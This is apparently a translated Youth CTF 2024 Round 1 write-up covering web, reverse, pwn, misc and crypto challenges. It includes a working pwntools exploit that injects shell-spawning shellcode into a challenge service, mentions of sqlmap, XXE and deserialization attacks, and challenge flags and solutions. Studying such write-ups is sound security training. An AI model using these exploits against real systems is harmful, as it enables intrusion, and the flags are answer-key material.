Youth CTF (青少年CTF) 2024 #Round_1

菜的雅痞

WEB

easymd5

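Use fastcoll for an MD5 collision: generate two files that have the same MD5 hash, change them to PDF and upload them.

PHP Backdoor

Look up the PHP version and search for it; the results are all about it.

PHP XXE

Exploit XXE in dom.php.

Easy_SQLi

SQL injection via POST.

Save the request as 1.txt.

Run sqlmap on it.

Prototype System

Scan with dirsearch and find www.zip.

Deobfuscate it: undo the base and URL encodings, and change eval to echo to print the original content.

Deserialization.

Pass the parameter.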


RE

Let's Play CS

https://s.threatbook.com/report/file/1f795a15191a4e19d32f4be3011beb6e718f2e62fe01dffebdd715424abd2f13

Run it in the cloud sandbox to get the IP.

pwn

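Simple Math Problems

Three calculation problems.

https://zs.symbolab.com/solver

For the first two, any online calculator solves them in one click; the numbers in the last one are a bit large, so just compute it with SageMath.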

from sage.all import *
x = SR.var('x')

# Left-hand side of the equation f(x) = 0
f = x**10 + 2**10 - 4*x - 6131066258749

# Numerical root search on the interval [0, 100000]
sol = find_root(f, 0, 100000)
print(sol)

Easy_Shellcode

from pwn import *
from LibcSearcher import *
from ctypes import *
context(os='Linux',arch = 'amd64',log_level ='debug')

# p = process('./pwn')
# p = gdb.debug('./pwn')
p = remote('challenge.qsnctf.com',31862)
elf = ELF('./pwn')

# libc = cdll.LoadLibrary('libc.so.6')
# libc.srand(1)  # set the seed

sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
rcv = lambda : p.recv()
ru = lambda s : p.recvuntil(s)
it = lambda : p.interactive()
d = lambda :gdb.attach(p)
b = lambda :pause()

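# Parse the hex address received at the start (drop the "0x" prefix and the last byte)
buf = int(rc(16)[2:-1],16)
print(buf)
shellcode = asm(shellcraft.sh())

# Shellcode padded to 0x108 bytes, followed by the address parsed above
payload = shellcode.ljust(0x108,b'a') + p64(buf)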

# d()
# b()
sl(payload)


it()

MISC

CTFer Revenge

The RAR file header shows up, so the data is presumably reversed; write code to reverse it back.

import re

# Read the text file
with open('11.txt', 'r') as file:
    lines = file.read()

# Split the text into a list of lines with splitlines()
lines_list = lines.splitlines()

def remove_between_pipes(line):
    # Drop the |...| column of each dump line
    return re.sub(r'(\|.+\|)', '', line)

new_lines_list = []
for line in lines_list:
    # Drop the last 8 characters of the line, then the |...| column
    new_line = line[:-8]
    new_line = remove_between_pipes(new_line)
    new_lines_list.append(' '.join(new_line.split('\n')))

# Write the result to a new text file, with the spaces removed
with open('114.txt', 'w') as new_file:
    for new_line in new_lines_list:
        new_file.write(new_line.replace(" ", ""))

# Reverse the whole hex string character by character and write it back
with open('114.txt', 'r') as file:
    lines = file.read()
new_lines_list = lines[::-1]
with open('114.txt', 'w') as new_file:
    for new_line in new_lines_list:
        new_file.write(new_line.replace(" ", ""))

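Import the hex text into 010 Editor and save it as a RAR file.

Finally, brute-force the password with ARCHPR, using the hint.

ez_model

Search online for a script and view the model data directly.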

import torch

pthfile = r'./easy.pth'  # path to the .pth file
# torch.load unpickles the file, so only load files you trust
model = torch.load(pthfile, torch.device('cpu'))  # load it on the CPU
print('type:')
print(type(model))
print('length:')
print(len(model))  # length of the model dictionary
print('key:')
for k in model.keys():  # keys in the model dictionary
    print(k)
print('value:')
for k in model:  # values in the model dictionary
    print(k, model[k])

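After two rounds of decoding, the guess is that it is base64 with a custom alphabet.

Light Chaser (追光者)

Repair the archive with Bandizip.

Found

Extract 追光者.jpg with binwalk and find an archive.

The comment is sort of a hint, I guess :(=

Found the password in 追光者.jpg (stop being so abstract, bro, I'm begging you).

Part of the flag is in the txt.

After extracting, a known-plaintext attack turns out to be possible; it yields the file with the other part of the flag, which then has to be reversed.

Sentimental (多情)

Extract an image; following the text hint, modify the width and height to reveal 996.

Convert to binary and sort the content of the text.

Xiaoguang's Book of Answers

Templar cipher, life.

Follow the official account and get the flag.

Questionnaire

qsnctf{青少年CTF蒸蒸日上}

Didn't win the prize draw, sad.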

CRYPTO

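Solve an Equation

ez_log

https://blog.csdn.net/Luiino/article/details/126117985

https://ctf-wiki.org/crypto/asymmetric/discrete-log/discrete-log/

Discrete logarithm.

It can be solved with the discrete_log(x, y, z) function from the sympy library, where x is the modulus, y the residue and z the base.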

from Crypto.Util.number import long_to_bytes
import sympy

m = 3
c = 2755382540415579102071064701464875587397358450731640269892589311709262533380944401636001606033435395119029405853044523473152024882723244640973125106544997919867124733729051371170794687714291
n = 3006156660704242356836102321001016782090189571028526298055526061772989406357037170723984497344618257575827271367883545096587962708266010793826346841303043716776726799898939374985320242033037

flag = sympy.discrete_log(n, c, m)
print(long_to_bytes(flag))

ezrsa

Obtain d and r.

Use r as n and decrypt the RSA directly.
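
Why substituting r for n can work, as an added example that is not from the original writeup: it assumes r is a prime factor of the modulus and the plaintext is smaller than r (the page does not say what r is). All parameters and messages below are constructed toy values.

```python
# Added example: constructed toy parameters, not the challenge's values.
E = 65537
P = 2**31 - 1                      # constructed prime factor (assumed)
R = 2**61 - 1                      # constructed prime, plays the role of "r"
N = P * R                          # public modulus
D = pow(E, -1, (P - 1) * (R - 1))  # private exponent for the full modulus


def encrypt(msg: bytes) -> int:
    """Textbook RSA encryption under the full modulus N."""
    m = int.from_bytes(msg, "big")
    if m >= N:
        raise ValueError("message does not fit in the modulus")
    return pow(m, E, N)


def decrypt_mod_factor(c: int, d: int, r: int) -> bytes:
    """Decrypt with only d and one prime factor r (N itself is never used).

    E*d = 1 + k*(P-1)*(R-1), so E*d = 1 (mod r-1) and, by Fermat's little
    theorem, c^d = m^(E*d) = m (mod r). The result is m mod r, which equals
    m only when m < r.
    """
    m = pow(c % r, d, r)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    short = b"qsnctf"      # 47 bits, smaller than R: recovered exactly
    longer = b"qsnctf{}"   # 63 bits, larger than R: only m mod R comes back
    print(decrypt_mod_factor(encrypt(short), D, R))
    print(decrypt_mod_factor(encrypt(longer), D, R) == longer)
```

If the output looks like garbage, the plaintext was probably larger than r and the full modulus is needed.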

Fourfold Encryption

The archive comment is base64; decoding it gives the password qsnctf.

HTML conversion.

Vigenère, then ROT13.

flag{ldvgosdabv_kfkjc_jcvsbdi}